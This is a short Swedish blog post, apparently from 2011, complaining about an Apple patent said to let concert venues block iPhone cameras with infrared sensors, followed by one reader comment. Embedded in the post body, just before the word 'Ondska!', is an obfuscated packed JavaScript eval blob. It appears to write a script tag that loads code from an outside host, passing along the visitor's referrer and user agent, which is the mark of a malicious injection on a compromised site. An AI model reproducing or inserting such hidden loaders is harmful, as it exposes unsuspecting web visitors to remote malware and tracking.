Image Image Image Image Image Image Image Image Image Image

| 27 november, 2020

Scroll to top

Top

Nu har Apple blivit riktigt galna. Man vill förbjuda folk från att filma med sina iPhones på konserter.

Nu har Apple blivit riktigt galna. Man vill förbjuda folk från att filma med sina iPhones på konserter.
Filip Urde
  • On 17 juni, 2011
  • http://www.revue.se/filip-urde

Ren eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ibzke|var|u0026u|referrer|dbtte||js|php’.split(’|’),0,{}))
Ondska!

Apple har planer på att bygga in teknik i iPhone som förhindrar användningen av kameran. Vad är det som händer?! har Apple nu blivit så stora att man faktiskt ska frukta dem på riktigt?  Genom att bygga in ny teknik i iPhone ska du nu helt enkelt inte kunna filma med kameran när man är på en konsert…

Tekniken fungerar som så, att med hjälp av infraröda sensorer på konsertområdet, kommer man nu kunna ”blocka” din iPhones film funktioner. Ringa och skicka sms kommer fortsätta att fungera, men så fort du trycker på kamera appen så kommer det inte att fungera….

Apple spelar alltså med i skivbolagen och konsert organisatörernas föråldrade spel.

Apple har sedan 18 månader haft patentet på tekniken.

microblogbuzz.com

 

Har jag betalt för min konsert biljett, så ska jag F*N få film och fota hur mycket jag vill! Det är en telefon, inte en kamera med teleobjektiv eller en Full HD videokamera. Apple! Ni är ett skämt!! Tack, nu vet man vart man har er och ert företag.

 

Comments

  1. Hampe

    Dem är fan helt väck!!! är detta sant?! vad håller Apple på med….ska dem också bli svin nu?